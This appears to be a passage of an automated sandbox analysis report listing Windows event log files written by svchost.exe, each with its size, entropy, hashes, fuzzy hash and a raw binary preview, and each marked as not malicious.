Preview:	ElfChnk......................................j..Pl..:6.......................................................................,.(............................................=...........................................................................................................................f...............?...........................m...................M...F...........................}/...............(..s...........&................G..............................................}-......................**.................E{.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.236143580344532
Encrypted:	false
SSDEEP:	384:Yhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinU:Y6Ovc0S5UyEeDgLJMm1F
MD5:	B826C4F1E8501C8B44D444E3D22421FA
SHA1:	1E05D127E4ADA0929135C44A598CFCEB5B4C3DF3
SHA-256:	8CC543159578D9517679465F01876987D03E865B39A1E838A25D1DBDAF7F49D3
SHA-512:	B5FBC7C73E82323222BCE3B47DAD9494C8F4F9AF74A2B9C863C6D9E2A6A4E592E5E3D01136C0B8ABB1A4B9D01085801FF6CC13629CEFD80980117D88F3D7F94C
Malicious:	false
Preview:	ElfChnk.........>...............>............p...q..h.A........................................................................................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................Fa......................................w...............................*...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7847876256447208
Encrypted:	false
SSDEEP:	384:KhGuZumutu4uEu5uOuDuyb2uPu1upueJuLuVu:Kw
MD5:	E151B97764C77FC371A900F824AF5F14
SHA1:	B56AD00FD836B0393E59652FFDF770652A8A1CC0
SHA-256:	B5727AE567E8F991FAE194219B0F985E5B7451DC89FC4B58314542615C9C7968
SHA-512:	B4AE0A611A979CF0BE114EEFD5B0A57EDA6064E9E87F6D2EBD6E43647BF03DBF6191B099B3B7BFAC93046ADF3116345B18A55F85560D66CEA8B37BC10B783556
Malicious:	false
Preview:	ElfChnk.....................................H!..."....&.........................................................................................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............>.......................................................................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.327837410933181
Encrypted:	false
SSDEEP:	384:HhmAmAltAlDAlAAliAlbAlIAlAtAlwAlEAluAlZAlFAl/AlFAlcAlEAl2AlhAlOj:HPPSWUSYvAybXZAFwYhh
MD5:	DCD843428C979E3A00FC181309C3B722
SHA1:	4549EACA2BF219818BD5944E314557B950117600
SHA-256:	701A82EFDFC248CB682D84DD80C5DB9C3790FB7A531C567AC068BD9553B75F99
SHA-512:	C4DF5F19FAFC72BC06DAE0A9477EFD5D80C5841EF436AE687DBFCEE5CB71BD3D6F0D249C6D042E7B7E5CA7966F87DFA627926E18B9EF4619D45A70D9B2BC5DD5
Malicious:	false
Preview:	ElfChnk.....................................X...............................................................................~..................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F....................................................y......................&....................d..........................................}h......**..............4...{...........>.&.........>.]v0].............A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.7635965228288155
Encrypted:	false
SSDEEP:	384:7h5p+ZpX0WpXbGpXiWpX5upX4CpX/SpXWSpXtmpX8apXj2pXqSpXBqpXA1m1pXn2:7DmROh4
MD5:	5EE3B3D4CD249C53E0861788EB8892AD
SHA1:	CDC9073766E7385722EF9E77ED1863D2BC8F66AC
SHA-256:	1D926FF680074AC2DE211418DD0CDEC183B94BF7781D4DB9C3041C65764BD8A4
SHA-512:	7FCE52950C7CF374836CBB1F116F03F54BA560123AECF1F3E50C2B9DAE679138787CD40A591B62CC58EF96170DEF657D3D21249693081FFF766DE86192601DF6
Malicious:	false
Preview:	ElfChnk......................................e..Hi..........................................................................rJo.........................................:...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&.......................................................................**................-.\|...........>.&.........>.]v0].............A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.8010361520578644
Encrypted:	false
SSDEEP:	384:EhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBq:EwDoh1VpGfVLDZv3
MD5:	DF8963A51A00C88E9C586C25969D5190
SHA1:	F1E0B4547D5B9E4EC171FFE1A7C021346E79F52B
SHA-256:	8F27CDE42098A7769A0423C6A1CE6081A2A77F7B3D6AC1AC9AB59D9ED01096EA
SHA-512:	4D9286287D12BD0A58C2805F588812737FF19C4B7D3DB3E385612A32DF856DE46C3A37CA762F638CA592127C2F4DF5A4462A16234C816C5F3296DF148041EFBB
Malicious:	false
Preview:	ElfChnk.\...............\.......................P............................................................................Jz.......................................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&..................................i...................................mS..............*..8...\........=..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1250907902680094
Encrypted:	false
SSDEEP:	384:ZhwCCRzCaCkClCzCYC/CyCVCGCMCvCDCIKCeCxCHC:ZKFz
MD5:	E1BA3F924C8E8D757F1FC430870194D7
SHA1:	642D0A3D281A199479C590C55560A9FA4B026CBB
SHA-256:	ED06D9A81F80B28B3B730EA950909B94C02931F98E794E5726430D2C8CDF98E8
SHA-512:	7025A0CEEFF9F315367C6A7CE4E3454F1DB8954C823C2829916DC829A4095BAC31EDB2BAA846203FA9D960088C9BE258624AC1752446D488C4FFE1DEA1700D50
Malicious:	false
Preview:	ElfChnk......................................1..04...+.......................................................................d.o................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................v)................................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	130936
Entropy (8bit):	4.555126061741261
Encrypted:	false
SSDEEP:	768:cKiD0zBi67fbKYiAEwuGHAnisE3Hi9cwWi4/IiuoQp2KiD0zBi67fbKYiAEwuGHb:TVPaY3BupnUrzgFVPaY3BupnUrzB
MD5:	581B5E93969FCFBA031D5089BBD5D51C
SHA1:	BF64AE066A652E142620E266EE5B417A5E51DD1F
SHA-256:	26D9B4C11AE2A5316BE272CC67C20A1E51D15BBF56447C04A968ED0140C88E08
SHA-512:	F351BA987CD2ACC91806248D3F8DEF66BC70C68FC745A7394ED0AF71882101650E4737659B69D11D80DC5B78F29C7913BA7694C1F696DD283C8A2F40814E0AE5
Malicious:	false
Preview:	ElfChnk..%.......%.......%.......%..........(...............................................................................l...........................................D...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&......................................................................*..`....%.........`\|...........>.&.......................................................................F.....!...A.A..............`\|....#..\|...@@..\|............%...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l..................T...'...L....................A..%...D........=.......M.e.s.s.a.g.e.......A..'...D........=.......F.u.n.c.t.i.o.n.......A..#...D........=.......S.o.u.r.c

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 14, DIRTY
Category:	dropped
Size (bytes):	78368
Entropy (8bit):	1.7576947877275884
Encrypted:	false
SSDEEP:	384:9zhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmtUmZCUmyUkhL6UsE0ZUmxUg:BY7LYJY7LY
MD5:	4863A2DCA01E411F7BAF99DA037B8ABF
SHA1:	6D4573024AF9D0001F5ACA2F2891F256A3C93DA2
SHA-256:	77F4B491E813BF53AD58ADFE1D634E963573504988F23833F4895D85BCEDBEAB
SHA-512:	D3DAFB81EB7F3845A65F52DA824037418E368067AE0A27E067BE15A25F0450953D53AA178F7C29E767BC7DC7E9CF7A5AA327CECF753F8D9E9248F09F8CCD15CE
Malicious:	false
Preview:	ElfFile.........................................................................................................................ElfChnk....................................../...1..Z.......................................................................+7................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&......................................................................................................................*..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67776
Entropy (8bit):	0.3680680749188651
Encrypted:	false
SSDEEP:	96:/kdKNVaO8hon/6FgskdKNVaO8hon/6Fg:cd8V7NiFgXd8V7NiFg
MD5:	66A26A9E4FF3F03CB0CD4F5CEE0529E4
SHA1:	87EC7FC57AB53A4E5CC6AAD39F93451805EAB66D
SHA-256:	23B7A497EBC0A106460413D352C7ADB319B489526836E9F35B12646466284AF4
SHA-512:	DF144E110C1F9CA7805556F18DF37D4AFDA7D4AFBBF14FEC705CF0320A71926D6DB7D91DAD9C6AFF77B04F09B6F93D77D0F99D3A93FB44458944A1657E1BEF6C
Malicious:	false
Preview:	ElfChnk..............................................`......................................................................>..8................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&.......................................................................**..............^..`\|...........>.&.........>.]v0].............A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.08846339837245
Encrypted:	false
SSDEEP:	768:qcvQmqxmknExmT3R8cH7XmfmIcMvq02WgYM9QSp:zmHp
MD5:	4333DD3FC3F3AAE9F5128C8A0FFFCBD9
SHA1:	2F470A58C7A498098F654A359B044B40FA8DB7EA
SHA-256:	E11F6FD91F9F36379DC273DF6126F883BF78CA98B2049D418A573D643F4B226A
SHA-512:	5D35DDDFD3356D4AAC0A2E07C5F56A096194B291771A7C07B9CB82E72018790A5E8E4D89A790D73C0C79CFD64F1F4D70C22610C527625C0E8043C34ABE84F741
Malicious:	false
Preview:	ElfChnk.y...............y...................XY..`[..X."........................................................................E.................!..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F...........................................................................^0...................................#..........o!.......'..............**......y..........By...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.40533568481708
Encrypted:	false
SSDEEP:	768:FRa8NjaPaHa7aza7aPafbaTaXa/ajabababaDaLaja3avaHaravaraXaza3ava3m:DN+
MD5:	77304A5A4F61C4BF5B82EA1A1E8AC7E0
SHA1:	822616EEF19BE22973D3282B94C64508965D474E
SHA-256:	C230427E768FAB6C2DD22B9AAFB23719AF8C87EE053AE4078494D03B4B392303
SHA-512:	E819D1A0DB85C02A56A479A2A7D2F4234D4712CBA2FFE75C4BEE468B8A2657FABBB41DBA5C5D99A9CE64238080D461420F9581B5B78D217328030DD161CE33EF
Malicious:	false
Preview:	ElfChnk.........@...............@...............`...1op.......................................................................i.................`...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&...................................9...................................**..H............O\|...........>.&.........>.]v0].............A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3134118906611416
Encrypted:	false
SSDEEP:	384:WhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ5XJSXJFgXJ4XJWXJqXJ:WQ0yUkNYwD8imLEvGFogqe
MD5:	686B8A7B2E59453E7D68268EBB3F1706
SHA1:	2372AA0C460B30CB15247E4E0E32C51C162961D6
SHA-256:	AD326E00711B5217FEA1BB8363B22DA007487EFA2F8AB509CA96C92C7C5C40A2
SHA-512:	EF1EDEEE2A820BF3AA3FF36CE787793B043165738B9E1EA9B4492FE5A426B6CEC824163BE075CEC83F62C18F376719DDE34C061E26B8DFD643D746E7747A87F2
Malicious:	false
Preview:	ElfChnk......................................>...A..6Q......................................................................K...................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................3..........................................C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.336920778990042
Encrypted:	false
SSDEEP:	384:WhsmEm1mgmJmkmhmImKm/mtmPmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfmPQ:WDDcxPG
MD5:	56B5B870DF89B66DCE31777458EFCE66
SHA1:	0EE8148AE794A0BFAB9A9CD2FDDB0F4EFCAC0C3E
SHA-256:	40DE696B80C468111A8D8C8ACAD66AD9376BEB3728F28A8B7F23ED891A186002
SHA-512:	260EBB5C9141D2B9513B11B1BA138D12E7F5A6C81566F7B03D2F9800E55306909173A281925AB81CAEE64C16EE8481E8AF1F5532188227F7D850E2375DE85882
Malicious:	false
Preview:	ElfChnk......................................................................................................................H.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................s...........................&...............#.......................................................**..p...........u.X.{...........>.&.........>.]v0].............A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.34603412180928
Encrypted:	false
SSDEEP:	384:ph121A2WN2H2H2t12o2N2sS2D2d2l2R2N2F2t2u2e2+262a2G2e2O2n2r2X272XU:pIN2bbt
MD5:	675C79F18F030DF89FC42C90B58B4D2F
SHA1:	9B8AC1D8F3D6D4F6658CB041BA1DF7D50192C702
SHA-256:	8FBEFCB8527CEB1F4F579DE8CE4332F6BA1AD8336ED5B21AB02F7FCE93FDC163
SHA-512:	216B37FA11509D6D3CB3478557FF67A8BD56B3009761DC0DB8B07331E28A856AC09E8C3695D5CC26AF0F3483A5C708D466F47E5B4CBE81A599D3EB724AF2F739
Malicious:	false
Preview:	ElfChnk.............................................hf.5......................................................................,:................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................%...........................................&.......................................................................**...............3A.\|...........>.&.........>.]v0].............A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4888
Entropy (8bit):	4.0120839773250925
Encrypted:	false
SSDEEP:	96:loRhR8Pyz0zx3jkzjR2yGUNSIrRhlKKSeRGAo+57Rpa:l0hRsR5jkzjRrSIrRTxZRpH57RU
MD5:	F8B62EE66B2B2974CFEAFF24A0B18165
SHA1:	4C3A5127BBB094D1E89B7315971DEC0FC777C051
SHA-256:	ED4F3CB3AE76C6C76A456F744AC8F0AA1B269184876AAA95FFD007FC8228DC44
SHA-512:	DB4B84F5FDC01C23AACCAD16813F26A157860972798152F8296ACF087E907497D8B4A8ADF8451E6B4F7AB02276955C31841D2112852AB351B8DF58F5D4076BF8
Malicious:	false
Preview:	ElfChnk.9.......e.......9.......e.....................C....................................................................p.0.................................F.......\|...=.......................................`......................u...3...........................................wU......`T..f...h.......TU..?.......................`........U......M.......M...F...!U..............................................9T..............................................9.......9....n..................&...............**......b.........D..............G.n..............................................................<.......T...>.!................@..D......#..\|...\|`..\|.......$...b....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l....s..9...6....s...q.\......&./.......A..#...`...........O.p.e.r.a.t.i.o.n._.T.e.m.p.o.r.a.r.y.E.s.s.S.t.a.r.t.e.d...o....j.....3.h.t.t.p.:././.m

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.260526451615761
Encrypted:	false
SSDEEP:	384:9cdhdhohUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYT:2BsFpkBBUE
MD5:	AA90687DA8FD49B009AA7A2E2E3F8D08
SHA1:	501C9EA5D2AAF85C82EB82E3E7C3289D89F6DB4A
SHA-256:	2F1E221F743A379AE007DFC31F8027F29B149F5A38B81F33FFE790646EBD40A3
SHA-512:	75E6AE300CF83EF056D5A43705A2776FDB66B7131F778820FB732C3ECA1506CE9ED94E02F96F1B5ACE7F8485B0B5BB5357A3837274C5321CA3CBA550A5532ECA
Malicious:	false
Preview:	ElfChnk.....................................x........k......................................................................C.Q.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................F.......................................................A...............**..H............^...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2067901678177455
Encrypted:	false
SSDEEP:	384:0hOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVhVDViZViVFVXD:0yjbgV
MD5:	51E3936C667110902BCB747531A47CB2
SHA1:	426A3FC03A56B18C23F6D3511E53E87A0158B1B7
SHA-256:	BBF7542482481D87C51337502D7A9D32ED4C336C47A0A5848F5D2E4E1376D4B8
SHA-512:	9F1CCDE346F431799A463D8848BA2D476892538D02CBD901CA1757012BF12D3444B0024529927A6B1B5B9627377FE4365F063D84EEB5E24D783626941E0417D8
Malicious:	false
Preview:	ElfChnk......... ............... ............5...7....<........................................................................l................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v...............&......................................................................*..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.221575081408243
Encrypted:	false
SSDEEP:	384:9hSBwBy8b5kBwBe6bBwBi8BwB4BwBkBwBRJBwB2BwBfBwBzBwBfYBwBWC/iDRBwJ:9K8bXfjskvFl
MD5:	627568605727BBF9442D5E61B3631A4E
SHA1:	2D2834A731F0090859E195B62E59132E6B5E4B8E
SHA-256:	17138BE62A3FB6FC6C17D91C39458C1FD926BF3548D2531C6298C8A6DABFCDB2
SHA-512:	7B22792588F04EEFCFF3659C83459C0AC6B3FC33481E40D0FAFA3051C9A3FDA97FB80D4E1FD93D5FAFB30CAF080296A6AA70C7785ACA6DD00FCF81CC7763B847
Malicious:	false
Preview:	ElfChnk.....................................PT...W...O=...................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F....................0...........................#..........................&...................O...................................................*...............Q..\|...........>.&.........>.]v0].............A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.4321359184704665
Encrypted:	false
SSDEEP:	384:BhgUEQUEkUEFUEBzmUEDUEoUEJUEzUEoUEmUEmUEdUEbUEPUEnxUE+UErUEtUEwC:Bcz+aX3io+Ns
MD5:	5ACA2E1080FFF733DFE22E7578B87DB1
SHA1:	091BA11704D0C15AA8A7A6A4F97245871B7E6021
SHA-256:	E38A91E3EE8024C0B964B48665B71213AC67ACBA37161E5C590CFAC9A93EF29A
SHA-512:	A6164436C545298E44AC098506DA4F288E6B31073D8E807769F1800EB6D1F89DB908E2B89F79D696234025D7C92B73238B1E32D503F38C57C0F1B3505A1F7C7A
Malicious:	false
